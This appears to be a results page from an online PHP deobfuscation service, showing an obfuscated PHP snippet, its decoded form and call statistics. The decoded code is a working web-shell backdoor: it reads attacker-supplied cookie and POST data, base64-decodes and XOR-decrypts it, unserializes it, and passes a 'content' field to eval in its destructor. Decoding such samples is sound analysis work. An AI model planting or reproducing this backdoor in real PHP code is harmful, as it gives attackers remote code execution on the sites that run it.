Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$bfKerPOL = "\x4f" . "\x6e" . "\x5a" . "\137" . "\107" . 'U' . chr (81) . chr ( 275 - 156 ..

Decoded Output download

<?  $bfKerPOL = "O" . "n" . "Z" . "_" . "G" . 'U' . chr (81) . chr ( 275 - 156 )."b";$fTTiMMp = "c" . 'l' . chr (97) . "s" . 's' . chr (95) . chr ( 927 - 826 )."x" . 'i' . chr (115) . chr (116) . 's';$LZCOEsufc = $fTTiMMp($bfKerPOL); $bfKerPOL = "34407";$ysrpkibv = $LZCOEsufc;$fTTiMMp = "53651";if (!$ysrpkibv){class OnZ_GUQwb{private $uaEFhxi;public static $XKLuYOmmQ = "ae5f5aeb-b4ea-4e70-9127-62cdf8f8d16a";public static $fplXxeZLV = 62972;public function __construct($DeRcm=0){$AqCmjfbuTf = $_COOKIE;$cKTTvAVizl = $_POST;$HPWpMJX = @$AqCmjfbuTf[substr(OnZ_GUQwb::$XKLuYOmmQ, 0, 4)];if (!empty($HPWpMJX)){$jDeYAsw = "base64";$ahdcxlZw = "";$HPWpMJX = explode(",", $HPWpMJX);foreach ($HPWpMJX as $OntjeVjVg){$ahdcxlZw .= @$AqCmjfbuTf[$OntjeVjVg];$ahdcxlZw .= @$cKTTvAVizl[$OntjeVjVg];}$ahdcxlZw = array_map($jDeYAsw . chr (95) . chr (100) . "e" . 'c' . chr ( 142 - 31 )."d" . 'e', array($ahdcxlZw,)); $ahdcxlZw = $ahdcxlZw[0] ^ str_repeat(OnZ_GUQwb::$XKLuYOmmQ, (strlen($ahdcxlZw[0]) / strlen(OnZ_GUQwb::$XKLuYOmmQ)) + 1);OnZ_GUQwb::$fplXxeZLV = @unserialize($ahdcxlZw);}}private function tlJylvdXIS(){if (is_array(OnZ_GUQwb::$fplXxeZLV)) {$WpAYh = str_replace("<" . '?' . "p" . chr (104) . "p", "", OnZ_GUQwb::$fplXxeZLV['c' . 'o' . "n" . "t" . chr ( 349 - 248 ).chr ( 558 - 448 ).'t']);eval($WpAYh); $ckiYh = "58683";exit();}}public function __destruct(){$this->tlJylvdXIS(); $ckiYh = "58683";$FuEgNoJg = str_pad($ckiYh, 10);}}$ziLIYE = new /* 23239 */ OnZ_GUQwb(); $ziLIYE = substr("47147_53628", 1);} ?>

Did this file decode correctly?

Original Code

$bfKerPOL = "\x4f" . "\x6e" . "\x5a" . "\137" . "\107" . 'U' . chr (81) . chr ( 275 - 156 )."\142";$fTTiMMp = "\x63" . 'l' . chr (97) . "\163" . 's' . chr (95) . chr ( 927 - 826 )."\x78" . 'i' . chr (115) . chr (116) . 's';$LZCOEsufc = $fTTiMMp($bfKerPOL); $bfKerPOL = "34407";$ysrpkibv = $LZCOEsufc;$fTTiMMp = "53651";if (!$ysrpkibv){class OnZ_GUQwb{private $uaEFhxi;public static $XKLuYOmmQ = "ae5f5aeb-b4ea-4e70-9127-62cdf8f8d16a";public static $fplXxeZLV = 62972;public function __construct($DeRcm=0){$AqCmjfbuTf = $_COOKIE;$cKTTvAVizl = $_POST;$HPWpMJX = @$AqCmjfbuTf[substr(OnZ_GUQwb::$XKLuYOmmQ, 0, 4)];if (!empty($HPWpMJX)){$jDeYAsw = "base64";$ahdcxlZw = "";$HPWpMJX = explode(",", $HPWpMJX);foreach ($HPWpMJX as $OntjeVjVg){$ahdcxlZw .= @$AqCmjfbuTf[$OntjeVjVg];$ahdcxlZw .= @$cKTTvAVizl[$OntjeVjVg];}$ahdcxlZw = array_map($jDeYAsw . chr (95) . chr (100) . "\x65" . 'c' . chr ( 142 - 31 )."\x64" . 'e', array($ahdcxlZw,)); $ahdcxlZw = $ahdcxlZw[0] ^ str_repeat(OnZ_GUQwb::$XKLuYOmmQ, (strlen($ahdcxlZw[0]) / strlen(OnZ_GUQwb::$XKLuYOmmQ)) + 1);OnZ_GUQwb::$fplXxeZLV = @unserialize($ahdcxlZw);}}private function tlJylvdXIS(){if (is_array(OnZ_GUQwb::$fplXxeZLV)) {$WpAYh = str_replace("\x3c" . '?' . "\x70" . chr (104) . "\x70", "", OnZ_GUQwb::$fplXxeZLV['c' . 'o' . "\156" . "\x74" . chr ( 349 - 248 ).chr ( 558 - 448 ).'t']);eval($WpAYh); $ckiYh = "58683";exit();}}public function __destruct(){$this->tlJylvdXIS(); $ckiYh = "58683";$FuEgNoJg = str_pad($ckiYh, 10);}}$ziLIYE = new /* 23239 */ OnZ_GUQwb(); $ziLIYE = substr("47147_53628", 1);}

Function Calls

chr 7
class_exists 1

Variables

$fTTiMMp class_exists
$bfKerPOL OnZ_GUQwb

Stats

MD5 1751ce655c1184a045da8c0a03aab02f
Eval Count 0
Decode Time 89 ms